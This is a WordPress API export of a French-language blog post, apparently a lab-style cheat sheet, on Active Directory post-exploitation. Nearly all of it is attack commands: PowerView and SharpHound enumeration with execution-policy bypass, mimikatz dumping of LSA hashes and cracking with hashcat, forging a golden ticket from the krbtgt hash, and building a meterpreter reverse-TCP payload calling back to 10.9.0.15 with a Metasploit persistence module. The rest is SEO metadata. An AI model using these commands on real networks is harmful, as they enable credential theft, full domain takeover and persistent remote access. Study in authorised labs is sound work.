{"id":514,"date":"2022-03-15T07:36:42","date_gmt":"2022-03-15T12:36:42","guid":{"rendered":"https:\/\/www.searchevolution.com\/security\/?p=514"},"modified":"2022-04-27T07:41:36","modified_gmt":"2022-04-27T12:41:36","slug":"post-exploitation","status":"publish","type":"post","link":"https:\/\/www.searchevolution.com\/security\/2022\/03\/15\/post-exploitation\/","title":{"rendered":"Post-Exploitation"},"content":{"rendered":"

Post-Exploitation<\/strong><\/p>\n

Powerview est un script de la suite powershell empire qui peut etre utilis\u00e9 pour l’\u00e9num\u00e9ration apr\u00e8s que vous ayez obtenu l’acc\u00e8es au syst\u00e8me. Vous trouvez les scripts utilis\u00e9s dans cet archive<\/a><\/p>\n

\npowershell -ep bypass\n. .\\PowerView.ps1\nGet-NetUser | select cn\nGet-NetGroup -GroupName *admin*\n<\/code><\/pre><\/p>\n
\u00c9num\u00e9ration avec Bloodhound<\/strong><\/p>\n
\napt-get install bloodhound\nneo4j console (neo4j:neo4j)\nbloodhound\n<\/code><\/pre><\/p>\n
\npowershell -ep bypass\n. .\\SharpHound.ps1\nInvoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip\n<\/code><\/pre><\/p>\n
Vous pouvez drag&drop le fichier loot.zip obtenu dans bloodhound.<\/p>\n
Voici les requ\u00eates que vous pouvez ex\u00e9cuter dans bloodhound
\n\"\"<\/p>\n
Vous pouvez facilement voir les usagers “kerberoastable” ou les administrateurs de domaine.<\/p>\n
Obtenir les hashes avec mimikatz<\/strong><\/p>\n
\nmimikatz.exe\nprivilege::debug\nlsadump::lsa \/patch\nhashcat -m 1000 <hash> rockyou.txt\n<\/code><\/pre><\/p>\n
Attaque avec un golden ticket et mimikatz<\/strong><\/p>\n
mimikatz\nprivilege::debug\nlsadump::lsa \/inject \/name:krbtgt #obtient le hash et l'identifiant de s\u00e9curit\u00e9 ID du compte Kerberos Ticket Granting Ticket. Ce qui va permettre de cr\u00e9er un golden ticket\nkerberos::golden \/user:Administrator \/domain:controller.local \/sid:sid_obtenu \/krbtgt:ntlm_obtenu \/id:500 #cr\u00e9ation du golden ticket\nmisc::cmd #utilisation du golden ticket (ouverture d'un command prompt avec les nouveaux privil\u00e8ges\n<\/code><\/pre><\/p>\n
\u00c9num\u00e9ration avec le server manager<\/strong><\/p>\n
Il y a l’outil Active Directory Users and Computers qui vous permet de voir les ordinateurs, controleurs de domaine, groupes et usagers (ainsi que les commentaires). Parfois les administrateurs mettent le mot de passe dans ceux-ci. L’outil event viewer permet aussi d’avoir un historique.<\/p>\n
Maintien de l’acc\u00e8s<\/strong><\/p>\n
\nmsfvenom -p windows\/meterpreter\/reverse_tcp LHOST=10.9.0.15 LPORT=4444 -f exe -o shell.exe\nmsfconsole\nuse exploit\/multi\/handler\nset payload windows\/meterpreter\/reverse_tcp\nset LHOST=10.9.0.15\nset LPORT=4444\nrun # maintenant, on ex\u00e9cute l'exploit sur la victime (shell.exe obtenu avec msfvenom)\nbackground\nuse exploit\/windows\/local\/persistence\nset session 1\n<\/code><\/pre><\/p>\n
Si la machine est ferm\u00e9e et red\u00e9marr\u00e9e, vous pourrez utiliser le “multi handler” avec le payload “windows\/meterpreter\/reverse_tcp” pour obtenir une nouvelle session meterpreter.<\/p>\n","protected":false},"excerpt":{"rendered":"
Post-Exploitation Powerview est un script de la suite powershell empire qui peut etre utilis\u00e9 pour l’\u00e9num\u00e9ration apr\u00e8s que vous ayez obtenu l’acc\u00e8es au syst\u00e8me. Vous trouvez les scripts utilis\u00e9s dans cet archive powershell -ep bypass . .\\PowerView.ps1 Get-NetUser | select cn Get-NetGroup -GroupName *admin* \u00c9num\u00e9ration avec Bloodhound apt-get install bloodhound neo4j console (neo4j:neo4j) bloodhound powershell -ep bypass . .\\SharpHound.ps1 Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip Vous pouvez drag&drop le fichier loot.zip obtenu dans bloodhound. Voici les requ\u00eates que vous pouvez ex\u00e9cuter dans bloodhound Vous pouvez facilement voir les usagers “kerberoastable” ou les administrateurs de domaine. Obtenir les hashes avec <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22],"tags":[],"yoast_head":"\nPost-Exploitation - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2022\/03\/15\/post-exploitation\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Post-Exploitation - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"Post-Exploitation Powerview est un script de la suite powershell empire qui peut etre utilis\u00e9 pour l’\u00e9num\u00e9ration apr\u00e8s que vous ayez obtenu l’acc\u00e8es au syst\u00e8me. Vous trouvez les scripts utilis\u00e9s dans cet archive powershell -ep bypass . .PowerView.ps1 Get-NetUser | select cn Get-NetGroup -GroupName *admin* \u00c9num\u00e9ration avec Bloodhound apt-get install bloodhound neo4j console (neo4j:neo4j) bloodhound powershell -ep bypass . .SharpHound.ps1 Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip Vous pouvez drag&drop le fichier loot.zip obtenu dans bloodhound. Voici les requ\u00eates que vous pouvez ex\u00e9cuter dans bloodhound Vous pouvez facilement voir les usagers “kerberoastable” ou les administrateurs de domaine. Obtenir les hashes avec\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2022\/03\/15\/post-exploitation\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2022-03-15T12:36:42+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-04-27T12:41:36+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.searchevolution.com\/security\/wp-content\/uploads\/2021\/07\/Requete_Domaine.png\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2022\/03\/15\/post-exploitation\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2022\/03\/15\/post-exploitation\/\",\"name\":\"Post-Exploitation - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2022-03-15T12:36:42+00:00\",\"dateModified\":\"2022-04-27T12:41:36+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2022\/03\/15\/post-exploitation\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2022\/03\/15\/post-exploitation\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2022\/03\/15\/post-exploitation\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Post-Exploitation\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Post-Exploitation - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2022\/03\/15\/post-exploitation\/","og_locale":"fr_CA","og_type":"article","og_title":"Post-Exploitation - S\u00e9curiser votre site","og_description":"Post-Exploitation Powerview est un script de la suite powershell empire qui peut etre utilis\u00e9 pour l’\u00e9num\u00e9ration apr\u00e8s que vous ayez obtenu l’acc\u00e8es au syst\u00e8me. Vous trouvez les scripts utilis\u00e9s dans cet archive powershell -ep bypass . .PowerView.ps1 Get-NetUser | select cn Get-NetGroup -GroupName *admin* \u00c9num\u00e9ration avec Bloodhound apt-get install bloodhound neo4j console (neo4j:neo4j) bloodhound powershell -ep bypass . .SharpHound.ps1 Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip Vous pouvez drag&drop le fichier loot.zip obtenu dans bloodhound. Voici les requ\u00eates que vous pouvez ex\u00e9cuter dans bloodhound Vous pouvez facilement voir les usagers “kerberoastable” ou les administrateurs de domaine. Obtenir les hashes avec","og_url":"https:\/\/www.searchevolution.com\/security\/2022\/03\/15\/post-exploitation\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2022-03-15T12:36:42+00:00","article_modified_time":"2022-04-27T12:41:36+00:00","og_image":[{"url":"https:\/\/www.searchevolution.com\/security\/wp-content\/uploads\/2021\/07\/Requete_Domaine.png"}],"author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2022\/03\/15\/post-exploitation\/","url":"https:\/\/www.searchevolution.com\/security\/2022\/03\/15\/post-exploitation\/","name":"Post-Exploitation - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2022-03-15T12:36:42+00:00","dateModified":"2022-04-27T12:41:36+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2022\/03\/15\/post-exploitation\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2022\/03\/15\/post-exploitation\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2022\/03\/15\/post-exploitation\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"Post-Exploitation"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/514"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=514"}],"version-history":[{"count":2,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/514\/revisions"}],"predecessor-version":[{"id":518,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/514\/revisions\/518"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=514"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=514"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=514"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}